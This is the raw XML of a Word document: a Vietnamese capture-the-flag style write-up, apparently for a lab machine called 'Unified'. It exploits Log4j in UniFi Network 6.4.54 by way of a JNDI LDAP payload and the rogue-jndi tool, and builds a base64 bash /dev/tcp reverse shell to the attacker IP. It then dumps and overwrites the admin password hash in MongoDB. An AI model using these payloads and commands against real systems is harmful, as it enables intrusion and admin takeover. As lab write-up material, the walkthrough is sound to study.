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62099" w14:textId="5EC8B4B1" w:rsidR="002F49FE" w:rsidRPr="00D17BEA" w:rsidRDefault="00D17BEA" w:rsidP="00D17BEA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D17BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8E123" w14:textId="3971D8B4" w:rsidR="00D17BEA" w:rsidRDefault="00D17BEA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9334D3" w14:textId="745C10C6" w:rsidR="00D17BEA" w:rsidRDefault="00D17B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attacker-ip: 10.10.14.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFC68A7" w14:textId="7DBB238B" w:rsidR="00D17BEA" w:rsidRDefault="00D17B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target-ip: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D17BEA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.129.245.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F7D17" w14:textId="755D0F01" w:rsidR="00D17BEA" w:rsidRDefault="00D17BEA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E159C44" w14:textId="073EB007" w:rsidR="00FF5C05" w:rsidRDefault="00FF5C0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F3C048" wp14:editId="368F94DA">
            <wp:extent cx="5943600" cy="2759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5E4E" w14:textId="77777777" w:rsidR="00FF5C05" w:rsidRDefault="00FF5C05">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDC13A0" w14:textId="203C57FA" w:rsidR="00D17BEA" w:rsidRDefault="00636D3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Phần mềm đang chạy trên cổng 8443 là UniFi network, phiên bản 6.4.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093DBDA2" w14:textId="20A093E5" w:rsidR="00636D34" w:rsidRDefault="00636D34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5679D4" w14:textId="7D650D18" w:rsidR="00636D34" w:rsidRDefault="00636D3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432444" wp14:editId="456216A5">
            <wp:extent cx="5281295" cy="266766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15062" r="5149" b="13107"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5282570" cy="266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3B25" w14:textId="254DC3CC" w:rsidR="00FF5C05" w:rsidRDefault="00FF5C05">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335D3C48" w14:textId="4607C36C" w:rsidR="00FF5C05" w:rsidRDefault="00FF5C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Ứng dụng bị dính lỗ hổng Log4j!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0E984" w14:textId="33AC542B" w:rsidR="00E84818" w:rsidRDefault="00E84818">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7525C86A" w14:textId="77777777" w:rsidR="00E84818" w:rsidRDefault="00E84818">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A7A104" w14:textId="27AA1AE6" w:rsidR="00E84818" w:rsidRPr="00E84818" w:rsidRDefault="00E84818">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84818">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D6C33E" w14:textId="210D0BA0" w:rsidR="00E84818" w:rsidRDefault="00E84818">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C83B466" w14:textId="16746380" w:rsidR="00E84818" w:rsidRDefault="00E848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Lỗ hổng nằm trong trường rememberme khi bạn đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19D742" w14:textId="1C63A378" w:rsidR="00E84818" w:rsidRDefault="00E84818">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3582F7AE" w14:textId="0F05983D" w:rsidR="00E84818" w:rsidRDefault="00E848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9B96AE" wp14:editId="751057CF">
            <wp:extent cx="4229100" cy="519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0F56" w14:textId="4E164A4C" w:rsidR="00E84818" w:rsidRDefault="00E84818">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C2A0B6" w14:textId="1234AC56" w:rsidR="00D1262B" w:rsidRDefault="00E848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Để kiểm tra lỗ hổng,</w:t>
      </w:r>
      <w:r w:rsidR="00D1262B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chúng ta nhập payload trong trường remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C42887" w14:textId="455368E2" w:rsidR="00D1262B" w:rsidRDefault="00D1262B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEB7587" w14:textId="6B781B8B" w:rsidR="00D1262B" w:rsidRPr="00D1262B" w:rsidRDefault="00D1262B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1262B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${jndi:ldap://10.10.14.5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5A33F" w14:textId="2E149C8D" w:rsidR="00D1262B" w:rsidRDefault="00D1262B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C6A004" w14:textId="5DA5742F" w:rsidR="00D1262B" w:rsidRDefault="00D126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máy chủ kết nối ngược với chúng ta thì ứng dụng bị dính lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D1748" w14:textId="1C9C3AB7" w:rsidR="00E84818" w:rsidRDefault="00E848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</w:t>
      </w:r>
      <w:r w:rsidR="00D1262B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D3E44F" wp14:editId="669AA067">
            <wp:extent cx="4191000" cy="510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34BB" w14:textId="0144B0E5" w:rsidR="00D1262B" w:rsidRDefault="00D1262B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4342F531" w14:textId="70928461" w:rsidR="00D1262B" w:rsidRDefault="00D126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B95E33" wp14:editId="006773C7">
            <wp:extent cx="5943600" cy="1311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80F6" w14:textId="157943CC" w:rsidR="00B71FDF" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682AA832" w14:textId="49ED426B" w:rsidR="00B71FDF" w:rsidRDefault="00B71F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Tiếp theo, chúng ta sẽ cố lấy reverse shell để tương tác với hệ điều hành Linux. Đầu tiên, bạn cần clone và xây dựng công cụ rogue-jndi từ Github:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19D9B7" w14:textId="30C208F7" w:rsidR="00B71FDF" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDEAA26" w14:textId="06587060" w:rsidR="00B71FDF" w:rsidRPr="00B04363" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B04363">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/veracode-research/rogue-jndi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBD497" w14:textId="517763CB" w:rsidR="00B71FDF" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3C52C3" w14:textId="53FF3DD3" w:rsidR="00B71FDF" w:rsidRDefault="00B71F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Đảm bảo bạn đã cài đặt Maven và Java trước khi biên dịch công cụ này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F3A2FE" w14:textId="5B3116DD" w:rsidR="00B71FDF" w:rsidRPr="0018700F" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018700F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>git clone https://github.com/veracode-research/rogue-jndi &amp;&amp; cd rogue-jndi &amp;&amp; mvn package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546FAD9" w14:textId="0F121327" w:rsidR="00B71FDF" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43757B1C" w14:textId="3E55FBD9" w:rsidR="00B71FDF" w:rsidRDefault="00B71F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Sau khi Java biên dịch, bạn sẽ phải tạo 1 lệnh để vận chuyển reverse shell. Hãy tạo reverse shell và mã hóa base64 bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB9AF0" w14:textId="69639A43" w:rsidR="00B71FDF" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D21FB92" w14:textId="1AD68CAF" w:rsidR="00B71FDF" w:rsidRPr="0018700F" w:rsidRDefault="00B71FDF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018700F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo 'bash -c bash -i &gt;&amp;/dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidRPr="0018700F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.10.14.5</w:t>
      </w:r>
      <w:r w:rsidRPr="0018700F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/4444 0&gt;&amp;1' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DFCA66" w14:textId="2B648711" w:rsidR="00F64130" w:rsidRDefault="00F64130">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9E731D" w14:textId="613D5CA9" w:rsidR="00F64130" w:rsidRDefault="00F641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Xây dựng lệnh của bạn trong rogue-jndi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A18A90C" w14:textId="6F19E92E" w:rsidR="00F64130" w:rsidRDefault="00F64130">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50136FEA" w14:textId="196DC713" w:rsidR="00F64130" w:rsidRPr="0018700F" w:rsidRDefault="00F64130">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018700F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuNS80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}" --hostname "</w:t>
      </w:r>
      <w:r w:rsidRPr="0018700F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.10.14.5</w:t>
      </w:r>
      <w:r w:rsidRPr="0018700F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC6717" w14:textId="5DF3B3A7" w:rsidR="0018700F" w:rsidRDefault="0018700F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693FF67E" w14:textId="528DDFA1" w:rsidR="0018700F" w:rsidRDefault="0018700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C905A5" wp14:editId="4D5694BF">
            <wp:extent cx="5943600" cy="4167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E42" w14:textId="77777777" w:rsidR="0018700F" w:rsidRDefault="0018700F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A9C8F4" w14:textId="0D954E50" w:rsidR="0018700F" w:rsidRDefault="001870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Thay đổi payload là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F16EFD" w14:textId="2A3BBD0C" w:rsidR="0018700F" w:rsidRDefault="0018700F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D046BB" w14:textId="7F3CE394" w:rsidR="0018700F" w:rsidRPr="001D3FC2" w:rsidRDefault="0018700F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D3FC2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${jndi:ldap://10.10.14.5:1389/o=tomcat}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65B522" w14:textId="0FACF105" w:rsidR="00FF5C05" w:rsidRDefault="00DC2F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1B6FA81" wp14:editId="60D5262C">
            <wp:extent cx="5943600" cy="153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1545" w14:textId="3CE7EAB5" w:rsidR="00A26F2B" w:rsidRDefault="00A26F2B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2823F84C" w14:textId="4DEE5C14" w:rsidR="00A26F2B" w:rsidRPr="00993B49" w:rsidRDefault="00993B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993B49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Post Explotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F4BFF" w14:textId="19236296" w:rsidR="00993B49" w:rsidRDefault="00993B49">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D89CC03" w14:textId="6279C7DA" w:rsidR="00993B49" w:rsidRDefault="00993B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bạn có reverse shell, bạn sẽ nhanh chóng nhận ra mình không phải là root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F4F040" w14:textId="73B1C354" w:rsidR="00993B49" w:rsidRDefault="00993B49">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059F65EE" w14:textId="1055340D" w:rsidR="00993B49" w:rsidRDefault="00993B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MongoDB đang lắng nghe trên localhost mà không cần xác thực</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA86FA" w14:textId="21D8FDC3" w:rsidR="00993B49" w:rsidRDefault="00993B49">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8BEC9F" w14:textId="30157A78" w:rsidR="00993B49" w:rsidRDefault="00993B4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081D3E" wp14:editId="78171D30">
            <wp:extent cx="5943600" cy="1465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C229" w14:textId="0C887FA1" w:rsidR="001D3FC2" w:rsidRDefault="001D3FC2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D91EB8" w14:textId="655DFA99" w:rsidR="00636D34" w:rsidRDefault="00506A3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Tương tác với dịch vụ MongoDB và cố gắng trích xuất mật khẩu của administrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6163BA8A" w14:textId="49F81CBE" w:rsidR="00506A38" w:rsidRDefault="00506A38">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E739258" w14:textId="468E9765" w:rsidR="00506A38" w:rsidRPr="00065AC8" w:rsidRDefault="00CE33A0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065AC8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752E577" w14:textId="7239F605" w:rsidR="00BE4CF0" w:rsidRDefault="00BE4CF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A01E52" w14:textId="4B89E144" w:rsidR="00BE4CF0" w:rsidRDefault="00BE4CF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Tên cơ sở dữ liệu mặc định của ứng dụng UniFi là ace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393BFFA" w14:textId="56389E3B" w:rsidR="00BE4CF0" w:rsidRDefault="00BE4CF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551B110D" w14:textId="04EF1831" w:rsidR="00BE4CF0" w:rsidRDefault="00BE4CF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F43794" wp14:editId="3FBB0657">
            <wp:extent cx="5943600" cy="1940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C872" w14:textId="40EE5920" w:rsidR="00BE4CF0" w:rsidRDefault="00BE4CF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E748C3" w14:textId="0894CF7D" w:rsidR="00065AC8" w:rsidRDefault="00065A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Password hash được lưu trong biến x_shadow nhưng trong trường hợp này nó không bẻ khóa được. Chúng ta sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00E373AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tạo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mật khẩu</w:t>
      </w:r>
      <w:r w:rsidR="00E373AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mới</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E373AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016CB6BE" w14:textId="77777777" w:rsidR="00065AC8" w:rsidRDefault="00065AC8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A91292" w14:textId="2E5DDED9" w:rsidR="000522AE" w:rsidRDefault="00E373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62BE95" wp14:editId="01C6B877">
            <wp:extent cx="5943600" cy="740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FC94" w14:textId="0BF89A20" w:rsidR="00E373AC" w:rsidRDefault="00E373AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3D87BA" w14:textId="78A9FCB5" w:rsidR="00E373AC" w:rsidRDefault="00E373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Thay biến x_shadow với hash chúng ta vừa tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C50AB5C" w14:textId="2DCAA8C9" w:rsidR="00E373AC" w:rsidRDefault="00E373AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414B78E1" w14:textId="77777777" w:rsidR="00E373AC" w:rsidRPr="006E564B" w:rsidRDefault="00E373AC" w:rsidP="00E373AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E564B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mongo --port 27117 ace --eval 'db.admin.update({"_id":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BA01FB" w14:textId="0DE0AC40" w:rsidR="00E373AC" w:rsidRPr="006E564B" w:rsidRDefault="00E373AC" w:rsidP="00E373AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E564B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"</w:t>
      </w:r>
      <w:r w:rsidR="006E564B" w:rsidRPr="006E564B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$6$SkN96ecVmdcQSvO5$KLXlhLeUpipQSclCuD8OoxmsTCkfn0JScjflTFK/csvFUbV2B0VtMxSblFKGMJc5VMsrP4o1Iyx3s8h5Lz9tj0</w:t>
      </w:r>
      <w:r w:rsidRPr="006E564B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"}})'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A621BAE" w14:textId="60CCAD70" w:rsidR="00CE33A0" w:rsidRDefault="00CE33A0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2726899D" w14:textId="0D61E269" w:rsidR="00CE33A0" w:rsidRDefault="00E373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62962D" wp14:editId="7CC42F92">
